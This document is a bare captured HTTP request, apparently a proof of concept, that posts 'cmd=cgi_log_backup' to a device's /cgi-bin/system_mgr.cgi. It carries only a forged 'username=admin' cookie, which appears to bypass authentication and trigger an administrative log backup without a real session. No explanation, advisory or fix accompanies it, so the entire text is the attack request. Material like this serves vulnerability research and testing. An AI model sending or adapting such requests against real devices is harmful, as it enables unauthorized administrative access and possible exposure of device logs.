POST /cgi-bin/system_mgr.cgi HTTP/1.1
Host: 192.168.1.201
Content-Length: 18
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.201
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.201/web/system_mgr/log.html
Accept-Encoding: gzip, deflate, br
Cookie: username=admin
Connection: keep-alive

cmd=cgi_log_backup